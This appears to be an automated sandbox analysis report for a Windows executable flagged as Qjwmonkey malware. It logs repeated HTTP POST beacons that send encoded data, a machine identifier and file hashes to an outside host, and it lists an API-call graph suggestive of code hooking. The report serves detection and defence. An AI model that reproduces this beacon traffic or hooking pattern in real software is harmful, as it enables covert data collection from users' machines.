Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:06.224539995 CET | 223 | OUT | POST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:06.224558115 CET | 331 | OUT | Data Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49786 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:18.630502939 CET | 223 | OUT | POST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:18.630520105 CET | 331 | OUT | Data Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49785 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:18.630525112 CET | 223 | OUT | POST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:18.630568981 CET | 13 | OUT | Data Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49860 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:31.129635096 CET | 223 | OUT | POST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:31.129647017 CET | 13 | OUT | Data Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49859 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:31.129673958 CET | 223 | OUT | POST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:31.129703999 CET | 331 | OUT | Data Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49938 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:43.676642895 CET | 223 | OUT | POST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:43.676662922 CET | 331 | OUT |
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49937 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:43.742341995 CET | 223 | OUT | POST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:43.743345976 CET | 13 | OUT | Data Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 50028 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:59.427057981 CET | 370 | OUT | POST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 50029 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:27:03.054822922 CET | 370 | OUT | POST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 50030 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:27:06.676209927 CET | 370 | OUT | POST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 50031 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:27:10.301943064 CET | 370 | OUT | POST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 50032 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:27:10.430201054 CET | 223 | OUT | POST /qy/rq HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 504
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:27:10.430227995 CET | 504 | OUT |
                                                                                                                                                                                                        Data Ascii: &inf={"ab":0,"appid":1,"avlt":null,"avs":0,"bclk":0,"bp":0,"cid":0,"ckw":"","clr":0,"cont":0,"conw":0,"ddr":0,"dlr":0,"etrc":20,"etrc2":0,"fre":0,"frr":0,"fs":0,"gqp":0,"kspdf":0,"kspic":0,"kszip":0,"lbc":0,"lbcr":0,"mbp":0,"md":0,"md5":"31549


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 50033 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:27:22.114681005 CET | 223 | OUT | POST /qy/lq HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 102
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:27:22.114716053 CET | 102 | OUT |
                                                                                                                                                                                                        Data Ascii: lq={"appid":1,"b3":0,"b3d":0,"b3i":0,"bq":0,"bqd":0,"bqi":0,"uid":"102e1490f0604c078f675cf9899bc6e6"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49727 | 151.101.194.137 | 443 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-03 14:26:00 UTC | 358 | OUT | GET /jquery-3.6.3.min.js HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                        Host: code.jquery.com
                                                                                                                                                                                                        Connection: Keep-Alive
2025-01-03 14:26:00 UTC | 612 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 89947
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                        ETag: "28feccc0-15f5b"
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 881384
                                                                                                                                                                                                        Date: Fri, 03 Jan 2025 14:26:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-lga21985-LGA, cache-nyc-kteb1890074-NYC
                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                        X-Cache-Hits: 1329, 0
                                                                                                                                                                                                        X-Timer: S1735914361.769254,VS0,VE1
                                                                                                                                                                                                        Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49725 | 18.244.18.122 | 443 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-03 14:26:00 UTC | 542 | OUT | GET /b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                        Connection: Keep-Alive
2025-01-03 14:26:01 UTC | 435 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 03 Jan 2025 14:26:01 GMT
                                                                                                                                                                                                        set-cookie: UID=1DD555d6637f2e69e913c321735914361; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 cbad29402e4e90baabe7151c3f1203b6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                        X-Amz-Cf-Id: AEAAGNMMXtpOB_QKsnKvle-xa9mEzyem8mGrqShzlRApRyzVgb91bg==



                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:09:25:53
                                                                                                                                                                                                        Start date:03/01/2025
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\nv8401986_110422.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:668'064 bytes
                                                                                                                                                                                                        MD5 hash:31549917CDC6E3F9D40A48EA5998493F
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Qjwmonkey, Description: Yara detected Qjwmonkey, Source: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false


                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:8.9%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:8.3%
                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                          Total number of Limit Nodes:85
90353->90360 90354->90352 90355 41b646 shared_ptr 90354->90355 90356 41b7fe 90354->90356 90355->90352 90363 51b528 std::runtime_error::runtime_error 26 API calls 90356->90363 90357 41b6c2 shared_ptr 90357->90353 90358->90357 90361 41b803 90358->90361 90382 41b810 44 API calls 3 library calls 90359->90382 90365 51b528 std::runtime_error::runtime_error 26 API calls 90361->90365 90363->90361 90364 41b701 90366 41b710 CreateFileMappingW 90364->90366 90367 41b70e 90364->90367 90368 41b808 90365->90368 90370 41b735 90366->90370 90372 41b75d shared_ptr 90366->90372 90367->90366 90369 51b528 std::runtime_error::runtime_error 26 API calls 90368->90369 90371 41b80d 90369->90371 90370->90368 90370->90372 90373 41b7d8 CloseHandle 90372->90373 90374 41b77f MapViewOfFile IsWindow 90372->90374 90373->90360 90375 41b7a0 SendMessageW 90374->90375 90376 41b7c7 UnmapViewOfFile CloseHandle 90374->90376 90375->90376 90377 41b7b5 ShowWindow SetForegroundWindow 90375->90377 90376->90373 90377->90376 90379 48305a 90378->90379 90383 482f70 90379->90383 90381 41b5f5 90381->90351 90382->90364 90384 482f85 90383->90384 90385 482f87 MultiByteToWideChar 90383->90385 90384->90385 90386 482ff9 90385->90386 90387 482fa2 90385->90387 90386->90381 90388 482fc8 MultiByteToWideChar 90387->90388 90389 482fe0 90388->90389 90390 40b650 SimpleUString::operator= 27 API calls 90389->90390 90390->90386 91310 424200 91311 424436 91310->91311 91312 42421e 91310->91312 91313 513805 _com_util::ConvertStringToBSTR 5 API calls 91311->91313 91314 424284 GetCurrentThread 91312->91314 91315 42422f GetCurrentThreadId InterlockedCompareExchange 91312->91315 91317 424449 91313->91317 91340 46f543 91314->91340 91315->91314 91318 424243 91315->91318 91320 42425c 91318->91320 91321 42427d 91318->91321 91319 424291 GetCurrentThreadId 91325 42429f 91319->91325 91337 4242b9 shared_ptr 91319->91337 91320->91321 91322 424260 VirtualProtect 91320->91322 91321->91314 91322->91320 91324 4242c8 GetLastError 91322->91324 
91324->91321 91326 513ac7 std::_Facet_Register 8 API calls 91325->91326 91325->91337 91328 4242d7 91326->91328 91327 424326 91332 42435c 91327->91332 91373 46ebc4 VirtualQuery _Atexit 91327->91373 91328->91327 91333 4242fa 91328->91333 91371 46ebc4 VirtualQuery _Atexit 91328->91371 91329 42438e 91336 4243bf VirtualProtect 91329->91336 91329->91337 91332->91329 91374 46ebc4 VirtualQuery _Atexit 91332->91374 91333->91327 91372 46ebc4 VirtualQuery _Atexit 91333->91372 91338 4243e0 91336->91338 91339 4243d8 GetLastError 91336->91339 91349 46f28e GetCurrentThreadId 91337->91349 91338->91337 91339->91337 91341 46f54f GetCurrentThread 91340->91341 91342 46f5aa 91340->91342 91343 46f55d 91341->91343 91344 46f559 91341->91344 91342->91319 91345 513ac7 std::_Facet_Register 8 API calls 91343->91345 91344->91319 91346 46f565 SuspendThread 91345->91346 91347 46f574 GetLastError 91346->91347 91348 46f584 shared_ptr 91346->91348 91347->91348 91348->91342 91350 46f2b9 91349->91350 91363 46f2af 91349->91363 91351 46f2c2 91350->91351 91367 46f2cc _Yarn 91350->91367 91381 46f1cd 11 API calls 2 library calls 91351->91381 91353 513805 _com_util::ConvertStringToBSTR 5 API calls 91355 46f541 91353->91355 91354 46f2c7 91354->91363 91355->91311 91356 46f415 GetCurrentProcess 91358 46f427 VirtualProtect FlushInstructionCache 91356->91358 91366 46f483 91356->91366 91357 46f338 GetThreadContext 91357->91367 91360 46f457 shared_ptr 91358->91360 91359 46f4f9 91375 46ee5f GetCurrentProcess 91359->91375 91360->91358 91360->91366 91363->91353 91364 46f508 ResumeThread 91365 46f51b shared_ptr 91364->91365 91365->91363 91365->91364 91366->91359 91369 46f4d6 VirtualFree 91366->91369 91367->91356 91367->91357 91368 46f3a0 SetThreadContext 91367->91368 91368->91367 91369->91366 91371->91333 91372->91327 91373->91332 91374->91329 91376 46ee82 91375->91376 91379 46eea6 91375->91379 91377 46ee88 VirtualProtect FlushInstructionCache 91376->91377 91377->91377 91377->91379 91378 513805 
_com_util::ConvertStringToBSTR 5 API calls 91380 46eeb3 91378->91380 91379->91378 91380->91363 91380->91364 91381->91354 91382 403a10 91384 403a5a Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91382->91384 91383 403ac8 shared_ptr 91386 4822b0 31 API calls 91383->91386 91384->91383 91385 403a8f 91384->91385 91438 4050c0 91384->91438 91385->91383 91389 403b35 91385->91389 91387 403afe shared_ptr 91386->91387 91390 51b528 std::runtime_error::runtime_error 26 API calls 91389->91390 91391 403b3a 91390->91391 91394 4041f0 91391->91394 91395 483970 63 API calls 91394->91395 91396 4042ae 91395->91396 91397 4042c5 91396->91397 91398 483970 63 API calls 91396->91398 91587 4059d0 RegOpenKeyExW 91397->91587 91400 4042ba 91398->91400 91400->91397 91531 4045e0 RegOpenKeyExW 91400->91531 91439 4050fd shared_ptr 91438->91439 91440 405174 shared_ptr 91439->91440 91441 51b528 std::runtime_error::runtime_error 26 API calls 91439->91441 91440->91384 91442 4051a9 shared_ptr 91441->91442 91443 405254 shared_ptr 91442->91443 91444 51b528 std::runtime_error::runtime_error 26 API calls 91442->91444 91443->91384 91445 40529d RegOpenKeyExW 91444->91445 91447 40539b __Getcvt 91445->91447 91455 405968 shared_ptr 91445->91455 91449 4053ad RegQueryValueExW RegCloseKey 91447->91449 91448 513805 _com_util::ConvertStringToBSTR 5 API calls 91450 4059a6 91448->91450 91451 405480 91449->91451 91450->91384 91451->91451 91452 40b650 SimpleUString::operator= 27 API calls 91451->91452 91456 4054a2 91452->91456 91453 405920 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91453->91455 91458 4059bc 91453->91458 91454 4054fd 91459 40b7a0 27 API calls 91454->91459 91455->91448 91456->91453 91456->91454 91457 40b7a0 27 API calls 91456->91457 91457->91454 91460 51b528 std::runtime_error::runtime_error 26 API calls 91458->91460 91461 4055d5 91459->91461 91462 4059c1 RegOpenKeyExW 91460->91462 91463 408050 43 API calls 91461->91463 91466 405ac2 __Getcvt 91462->91466 91467 
405c58 91462->91467 91465 4055ee 91463->91465 91469 405610 91465->91469 91470 4055f7 GetProcAddress 91465->91470 91472 405ad4 RegQueryValueExW RegCloseKey 91466->91472 91468 513805 _com_util::ConvertStringToBSTR 5 API calls 91467->91468 91471 405c70 91468->91471 91469->91453 91474 470690 27 API calls 91469->91474 91470->91469 91471->91384 91472->91467 91473 405b55 91472->91473 91475 40b650 SimpleUString::operator= 27 API calls 91473->91475 91476 40563d __Getcvt 91474->91476 91477 405be8 91475->91477 91481 475ef0 27 API calls 91476->91481 91478 405c33 91477->91478 91479 405bf6 91477->91479 91482 405c26 91478->91482 92376 40cb30 141 API calls 3 library calls 91478->92376 92374 40dee0 27 API calls 3 library calls 91479->92374 91485 40565f __Getcvt 91481->91485 91486 4050c0 134 API calls 91482->91486 91484 405c13 92375 40dee0 27 API calls 3 library calls 91484->92375 91488 40a120 80 API calls 91485->91488 91486->91467 91489 405684 91488->91489 92367 40a000 108 API calls 91489->92367 91491 4056ab 91492 476080 87 API calls 91491->91492 91493 4056c6 91492->91493 91494 4058f7 91493->91494 91496 471d90 27 API calls 91493->91496 91532 4046e4 __Getcvt 91531->91532 91540 404d89 shared_ptr 91531->91540 91535 4046f6 RegQueryValueExW RegCloseKey 91532->91535 91533 513805 _com_util::ConvertStringToBSTR 5 API calls 91534 404dc7 91533->91534 91534->91397 91536 4047c2 91535->91536 91536->91536 91537 40b650 SimpleUString::operator= 27 API calls 91536->91537 91541 4047e4 91537->91541 91538 404d41 Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91538->91540 91542 404dce 91538->91542 91539 40483f 91544 40b7a0 27 API calls 91539->91544 91540->91533 91541->91538 91541->91539 91543 40b7a0 27 API calls 91541->91543 91545 51b528 std::runtime_error::runtime_error 26 API calls 91542->91545 91543->91539 91546 4048ef 91544->91546 91547 404dd3 91545->91547 91548 408050 43 API calls 91546->91548 91549 404908 91548->91549 91550 404911 GetProcAddress 91549->91550 91551 40492a 
91549->91551 91550->91551 91551->91538 91552 470690 27 API calls 91551->91552 91553 404957 __Getcvt 91552->91553 91554 475ef0 27 API calls 91553->91554 91555 404979 __Getcvt 91554->91555 91896 40a120 91555->91896 91588 405ac2 __Getcvt 91587->91588 91589 405c58 91587->91589 91592 405ad4 RegQueryValueExW RegCloseKey 91588->91592 91590 513805 _com_util::ConvertStringToBSTR 5 API calls 91589->91590 91591 4042d3 91590->91591 91604 405c80 91591->91604 91592->91589 91593 405b55 91592->91593 91594 40b650 SimpleUString::operator= 27 API calls 91593->91594 91595 405be8 91594->91595 91596 405c33 91595->91596 91597 405bf6 91595->91597 91599 405c26 91596->91599 92215 40cb30 141 API calls 3 library calls 91596->92215 92213 40dee0 27 API calls 3 library calls 91597->92213 91602 4050c0 141 API calls 91599->91602 91601 405c13 92214 40dee0 27 API calls 3 library calls 91601->92214 91602->91589 91605 405cda __Getcvt 91604->91605 91606 408180 43 API calls 91605->91606 91607 405ce2 91606->91607 91608 405cf1 GetProcAddress 91607->91608 91609 405d14 91607->91609 91608->91609 91637 4061ef Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection 91609->91637 92216 51ac8c 91609->92216 91610 513805 _com_util::ConvertStringToBSTR 5 API calls 91612 4042da 91610->91612 91658 406230 91612->91658 91614 408050 43 API calls 91615 405d73 91614->91615 91616 405d91 PathFileExistsA 91615->91616 91617 405d7c GetProcAddress 91615->91617 91618 405da5 91616->91618 91616->91637 91617->91616 91619 470690 27 API calls 91618->91619 91620 405dc4 __Getcvt 91619->91620 91621 475ef0 27 API calls 91620->91621 91637->91610 91659 40628a __Getcvt 91658->91659 91660 408180 43 API calls 91659->91660 91661 406292 91660->91661 91662 40629b GetProcAddress 91661->91662 91663 4062c2 91661->91663 91662->91663 91663->91663 91667 40633e SimpleUString::operator= 91663->91667 91685 407351 shared_ptr 91663->91685 92279 40d7e0 27 API calls 5 library calls 91663->92279 91664 513805 _com_util::ConvertStringToBSTR 5 API calls 
